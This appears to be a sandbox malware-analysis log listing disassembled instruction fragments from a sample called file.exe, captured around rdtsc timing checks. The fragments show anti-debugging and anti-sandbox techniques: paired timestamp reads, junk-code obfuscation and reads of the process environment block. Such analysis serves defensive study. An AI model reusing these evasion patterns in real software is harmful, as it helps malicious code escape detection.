Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198902C second address: 198904E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8078BD3398h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198904E second address: 1989054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198AB11 second address: 198AB16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198D779 second address: 198D78D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jp 00007F80798BCE56h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 198EDF4 second address: 198EE0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3396h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1992670 second address: 1992698 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F80798BCE5Eh 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F80798BCE63h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725001B second address: 7250033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD3394h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250033 second address: 72500B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F80798BCE66h 0x00000011 push eax 0x00000012 jmp 00007F80798BCE5Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F80798BCE64h 0x0000001f adc ah, FFFFFF88h 0x00000022 jmp 00007F80798BCE5Bh 0x00000027 popfd 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e jmp 00007F80798BCE62h 0x00000033 mov eax, dword ptr fs:[00000030h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72500B1 second address: 72500B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72500B7 second address: 72500EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F80798BCE67h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72500EB second address: 72501C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3399h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F8078BD338Eh 0x0000000f push eax 0x00000010 jmp 00007F8078BD338Bh 0x00000015 xchg eax, ebx 0x00000016 jmp 00007F8078BD3396h 0x0000001b mov ebx, dword ptr [eax+10h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F8078BD338Eh 0x00000025 xor cl, FFFFFF98h 0x00000028 jmp 00007F8078BD338Bh 0x0000002d popfd 0x0000002e pushad 0x0000002f mov bx, cx 0x00000032 pushfd 0x00000033 jmp 00007F8078BD3392h 0x00000038 sbb cx, 15F8h 0x0000003d jmp 00007F8078BD338Bh 0x00000042 popfd 0x00000043 popad 0x00000044 popad 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push edi 0x0000004a pop eax 0x0000004b pushfd 0x0000004c jmp 00007F8078BD3397h 0x00000051 sbb ax, 666Eh 0x00000056 jmp 00007F8078BD3399h 0x0000005b popfd 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72501C4 second address: 72501CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72501CA second address: 7250203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8078BD3396h 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8078BD3397h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250203 second address: 725022C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [74E806ECh] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725022C second address: 7250230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250230 second address: 7250236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250236 second address: 7250267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3392h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8078BD3397h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250267 second address: 72502E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F80798BCE62h 0x00000009 xor ax, 7E98h 0x0000000e jmp 00007F80798BCE5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jne 00007F80798BDE62h 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F80798BCE5Bh 0x00000024 add ecx, 0AFB775Eh 0x0000002a jmp 00007F80798BCE69h 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, edi 0x00000032 pushad 0x00000033 mov cx, 1BC3h 0x00000037 mov ch, B1h 0x00000039 popad 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F80798BCE61h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72502E2 second address: 7250327 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 306BBAD2h 0x00000008 pushfd 0x00000009 jmp 00007F8078BD3393h 0x0000000e and cx, DECEh 0x00000013 jmp 00007F8078BD3399h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250327 second address: 725033A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725033A second address: 72503AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8078BD338Fh 0x00000008 pop ecx 0x00000009 mov edi, 18156DBCh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 call dword ptr [74E50B60h] 0x00000017 mov eax, 750BE5E0h 0x0000001c ret 0x0000001d pushad 0x0000001e jmp 00007F8078BD3391h 0x00000023 pushfd 0x00000024 jmp 00007F8078BD3390h 0x00000029 and eax, 1A1B1C08h 0x0000002f jmp 00007F8078BD338Bh 0x00000034 popfd 0x00000035 popad 0x00000036 push 00000044h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F8078BD3395h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72503AA second address: 72503CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F80798BCE5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72503CF second address: 7250428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3391h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ax, F6D3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov ax, 0841h 0x00000016 pushfd 0x00000017 jmp 00007F8078BD338Eh 0x0000001c sub ecx, 38161658h 0x00000022 jmp 00007F8078BD338Bh 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, edi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F8078BD3390h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250428 second address: 725042E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725042E second address: 7250434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250434 second address: 7250438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250438 second address: 725047C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3398h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [eax] 0x0000000d jmp 00007F8078BD3390h 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F8078BD338Ah 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725047C second address: 7250480 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250480 second address: 7250486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250505 second address: 7250509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250509 second address: 725051A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725051A second address: 72505D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F80798BCE67h 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 jmp 00007F80798BCE5Bh 0x00000015 je 00007F80E746BFB7h 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F80798BCE64h 0x00000022 or al, FFFFFFB8h 0x00000025 jmp 00007F80798BCE5Bh 0x0000002a popfd 0x0000002b call 00007F80798BCE68h 0x00000030 mov ebx, eax 0x00000032 pop ecx 0x00000033 popad 0x00000034 mov eax, 00000000h 0x00000039 pushad 0x0000003a mov eax, 469D91CFh 0x0000003f movzx ecx, dx 0x00000042 popad 0x00000043 mov dword ptr [esi], edi 0x00000045 jmp 00007F80798BCE67h 0x0000004a mov dword ptr [esi+04h], eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F80798BCE65h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72505D0 second address: 72505E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8078BD338Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72505E0 second address: 72505E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72505E4 second address: 7250697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007F8078BD3397h 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F8078BD3394h 0x0000001a sub cx, 3798h 0x0000001f jmp 00007F8078BD338Bh 0x00000024 popfd 0x00000025 call 00007F8078BD3398h 0x0000002a call 00007F8078BD3392h 0x0000002f pop ecx 0x00000030 pop edi 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+4Ch] 0x00000035 pushad 0x00000036 mov dx, si 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F8078BD3396h 0x00000040 sub cl, FFFFFF88h 0x00000043 jmp 00007F8078BD338Bh 0x00000048 popfd 0x00000049 push ecx 0x0000004a pop edx 0x0000004b popad 0x0000004c popad 0x0000004d mov dword ptr [esi+10h], eax 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250697 second address: 725069E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, B4h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725069E second address: 7250795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8078BD3395h 0x00000009 jmp 00007F8078BD338Bh 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F8078BD3398h 0x00000015 and al, 00000078h 0x00000018 jmp 00007F8078BD338Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop edx 0x00000020 pop eax 0x00000021 mov eax, dword ptr [ebx+50h] 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F8078BD3394h 0x0000002b jmp 00007F8078BD3395h 0x00000030 popfd 0x00000031 mov ecx, 3CE8E687h 0x00000036 popad 0x00000037 mov dword ptr [esi+14h], eax 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007F8078BD3398h 0x00000041 adc ecx, 6056B768h 0x00000047 jmp 00007F8078BD338Bh 0x0000004c popfd 0x0000004d jmp 00007F8078BD3398h 0x00000052 popad 0x00000053 mov eax, dword ptr [ebx+54h] 0x00000056 pushad 0x00000057 movzx esi, bx 0x0000005a mov dx, 235Eh 0x0000005e popad 0x0000005f mov dword ptr [esi+18h], eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F8078BD3397h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250795 second address: 72507B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72507B2 second address: 72507B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72507B8 second address: 7250832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b pushad 0x0000000c jmp 00007F80798BCE65h 0x00000011 call 00007F80798BCE60h 0x00000016 call 00007F80798BCE62h 0x0000001b pop ecx 0x0000001c pop edx 0x0000001d popad 0x0000001e mov dword ptr [esi+1Ch], eax 0x00000021 jmp 00007F80798BCE5Eh 0x00000026 mov eax, dword ptr [ebx+5Ch] 0x00000029 pushad 0x0000002a mov di, si 0x0000002d popad 0x0000002e mov dword ptr [esi+20h], eax 0x00000031 jmp 00007F80798BCE5Fh 0x00000036 mov eax, dword ptr [ebx+60h] 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250832 second address: 7250836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250836 second address: 725083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 725083A second address: 7250840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250840 second address: 7250878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+24h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F80798BCE5Eh 0x00000013 sub ax, E338h 0x00000018 jmp 00007F80798BCE5Bh 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 mov si, C705h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250878 second address: 72508E7 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8078BD3392h 0x00000008 sub ah, FFFFFF98h 0x0000000b jmp 00007F8078BD338Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov eax, dword ptr [ebx+64h] 0x00000017 jmp 00007F8078BD3396h 0x0000001c mov dword ptr [esi+28h], eax 0x0000001f jmp 00007F8078BD3390h 0x00000024 mov eax, dword ptr [ebx+68h] 0x00000027 jmp 00007F8078BD3390h 0x0000002c mov dword ptr [esi+2Ch], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72508E7 second address: 72508ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72508ED second address: 72509A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD3394h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+6Ch] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8078BD338Eh 0x00000014 sbb eax, 405BF3E8h 0x0000001a jmp 00007F8078BD338Bh 0x0000001f popfd 0x00000020 jmp 00007F8078BD3398h 0x00000025 popad 0x00000026 mov word ptr [esi+30h], ax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F8078BD338Eh 0x00000031 or al, 00000078h 0x00000034 jmp 00007F8078BD338Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007F8078BD3398h 0x00000040 xor ax, ABD8h 0x00000045 jmp 00007F8078BD338Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov ax, word ptr [ebx+00000088h] 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 mov cx, bx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72509A1 second address: 72509A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72509A6 second address: 72509C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov ax, 329Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov word ptr [esi+32h], ax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8078BD338Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 72509C5 second address: 7250A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+0000008Ch] 0x0000000f pushad 0x00000010 movzx ecx, dx 0x00000013 pushfd 0x00000014 jmp 00007F80798BCE69h 0x00000019 and esi, 0A33D636h 0x0000001f jmp 00007F80798BCE61h 0x00000024 popfd 0x00000025 popad 0x00000026 mov dword ptr [esi+34h], eax 0x00000029 pushad 0x0000002a mov si, D5C3h 0x0000002e pushad 0x0000002f mov cx, 4C35h 0x00000033 pushfd 0x00000034 jmp 00007F80798BCE62h 0x00000039 or ch, FFFFFF88h 0x0000003c jmp 00007F80798BCE5Bh 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 mov eax, dword ptr [ebx+18h] 0x00000047 jmp 00007F80798BCE66h 0x0000004c mov dword ptr [esi+38h], eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jmp 00007F80798BCE5Dh 0x00000057 movzx ecx, dx 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250A78 second address: 7250AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c pushad 0x0000000d jmp 00007F8078BD338Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F8078BD3390h 0x0000001a jmp 00007F8078BD3395h 0x0000001f popfd 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AC1 second address: 7250AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esi+3Ch], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dl, 96h 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250AE1 second address: 7250B3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8078BD338Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8078BD3394h 0x00000013 add cx, 8398h 0x00000018 jmp 00007F8078BD338Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 mov dword ptr [esi+40h], eax 0x00000026 jmp 00007F8078BD338Eh 0x0000002b lea eax, dword ptr [ebx+00000080h] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250B3C second address: 7250B59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250B59 second address: 7250BC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, A222h 0x00000007 pushfd 0x00000008 jmp 00007F8078BD3393h 0x0000000d jmp 00007F8078BD3393h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007F8078BD338Bh 0x00000020 pushfd 0x00000021 jmp 00007F8078BD3398h 0x00000026 adc si, 2C48h 0x0000002b jmp 00007F8078BD338Bh 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BC6 second address: 7250BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F80798BCE5Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BF3 second address: 7250BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BF9 second address: 7250BFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250BFD second address: 7250C01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250C01 second address: 7250C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F80798BCE64h 0x00000010 or ax, 1C38h 0x00000015 jmp 00007F80798BCE5Bh 0x0000001a popfd 0x0000001b movzx eax, di 0x0000001e popad 0x0000001f nop 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 mov cx, dx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250C3C second address: 7250C60 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, ebx 0x00000008 popad 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F8078BD3391h 0x00000011 nop 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 movzx eax, dx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250D1B second address: 7250D62 instructions: 0x00000000 rdtsc 0x00000002 call 00007F80798BCE5Bh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e pushad 0x0000000f jmp 00007F80798BCE65h 0x00000014 call 00007F80798BCE60h 0x00000019 mov bl, ah 0x0000001b pop edx 0x0000001c popad 0x0000001d mov dword ptr [esi+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250D62 second address: 7250D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7250D66 second address: 7250D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F80798BCE5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
